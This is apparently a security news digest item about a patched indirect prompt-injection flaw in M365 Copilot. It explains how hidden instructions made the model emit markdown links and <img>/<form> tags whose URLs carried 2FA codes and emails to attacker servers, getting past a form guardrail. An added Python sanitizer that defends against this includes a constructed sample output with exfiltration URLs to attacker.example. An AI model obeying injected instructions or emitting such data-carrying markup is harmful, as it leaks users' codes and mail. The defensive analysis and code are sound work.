Critical M365 Copilot bug let attackers exfiltrate 2FA codes and emails
Microsoft patched a maximum-severity (critical) vulnerability in M365 Copilot last Tuesday, and on Monday researchers published a proof of concept showing how the bug could be used to extract 2FA codes and other sensitive data from emails Copilot could access. The exploit relied on indirect prompt injection: instructions hidden in third-party content that Copilot was asked to summarize or draft a reply to.
Copilot has a guardrail against submitting forms, but the researchers bypassed it by having the model emit markdown links and HTML tags such as <img> and <form>. When the client renders that output, the tags trigger background web requests whose URLs carry the stolen data to attacker-controlled servers, with no click required. The disclosure highlights the unresolved core problem: an LLM still cannot reliably distinguish the user's instructions from instructions hidden in the content it is processing. Patching this bug closes one exfiltration sink; the injection itself remains possible, so the durable mitigation is on the output side, where image and form references rendered from model output are blocked or restricted to an allowlist.
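The output-side control described above, as an added example that is not part of the original report or Microsoft's fix: a sanitizer that runs over an assistant's markdown before it is rendered, rewrites any image or form reference (markdown or raw HTML) pointing outside an allowlisted host, and defangs clickable links whose query strings carry data that looks lifted from the context, such as a 6 to 8 digit code or an email address. The allowlisted host, the attacker host and the sample model output are all constructed for the example.

```python
"""Sanitize LLM markdown output before rendering (added example, not M365 code).

Indirect prompt injection can make an assistant emit an image tag or link whose
URL embeds data from its context (an email body, a 2FA code). The browser
fetches an image without user interaction, so the request is the exfiltration.
This example neutralizes those sinks at render time; hosts are assumptions.
"""
import re
from urllib.parse import parse_qs, urlparse

# Assumption: only the tenant's own CDN may serve images into the chat UI.
ALLOWED_IMAGE_HOSTS = {"cdn.example.corp"}

MD_IMAGE = re.compile(r'!\[([^\]]*)\]\(([^)\s]+)(?:\s+"[^"]*")?\)')
MD_LINK = re.compile(r'(?<!!)\[([^\]]*)\]\(([^)\s]+)(?:\s+"[^"]*")?\)')
HTML_IMG = re.compile(r'<img\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\'][^>]*>', re.I)
HTML_FORM = re.compile(r'<form\b[^>]*>.*?</form>', re.I | re.S)
FORM_ACTION = re.compile(r'\baction\s*=\s*["\']([^"\']+)["\']', re.I)


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def suspicious_params(url):
    """Query values that look like context data: 6-8 digit codes, addresses, long blobs."""
    found = {}
    for key, values in parse_qs(urlparse(url).query).items():
        for v in values:
            if re.fullmatch(r"\d{6,8}", v) or "@" in v or len(v) > 32:
                found[key] = v
    return found


def sanitize(text):
    """Rewrite exfiltration sinks in model output.

    Returns (clean_text, findings); each finding is (kind, url, suspicious_params).
    Images are allowlisted by host, forms are never rendered, and clickable
    links are kept unless their query string carries context-looking data.
    """
    findings = []

    def drop_image(kind, url, original):
        if host_of(url) in ALLOWED_IMAGE_HOSTS:
            return original
        findings.append((kind, url, suspicious_params(url)))
        return f"[image removed: {host_of(url)}]"

    def drop_form(m):
        action = FORM_ACTION.search(m.group(0))
        url = action.group(1) if action else ""
        findings.append(("html_form", url, suspicious_params(url)))
        return "[form removed]"

    def defang_link(m):
        label, url = m.group(1), m.group(2)
        params = suspicious_params(url)
        if not params:
            return m.group(0)
        findings.append(("md_link", url, params))
        return f"{label} [link removed: {host_of(url)}]"

    text = MD_IMAGE.sub(lambda m: drop_image("md_image", m.group(2), m.group(0)), text)
    text = HTML_IMG.sub(lambda m: drop_image("html_img", m.group(1), m.group(0)), text)
    text = HTML_FORM.sub(drop_form, text)
    text = MD_LINK.sub(defang_link, text)
    return text, findings


# Constructed sample of what an injected instruction could make the model emit.
SAMPLE_OUTPUT = (
    "Summary of your latest messages:\n"
    "- Contoso sent a verification code: 482913\n"
    "![status](https://attacker.example/i.png?c=482913&u=alice@corp.example)\n"
    '<img src="https://attacker.example/p.gif?code=482913">\n'
    '<form action="https://attacker.example/submit"><input name="c" value="482913"></form>\n'
    "[Reply here](https://attacker.example/r?m=alice@corp.example)\n"
    "![logo](https://cdn.example.corp/logo.png)\n"
)

if __name__ == "__main__":
    clean, found = sanitize(SAMPLE_OUTPUT)
    print(clean)
    for kind, url, params in found:
        print(kind, url, params)
```

The code itself still appears in the visible summary; only the outbound request that would carry it off-tenant is blocked. The value heuristic for links is deliberately loose (data can also be placed in the path rather than the query), which is why images and forms are gated by host allowlist alone rather than by content inspection.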
View full digest for June 17, 2026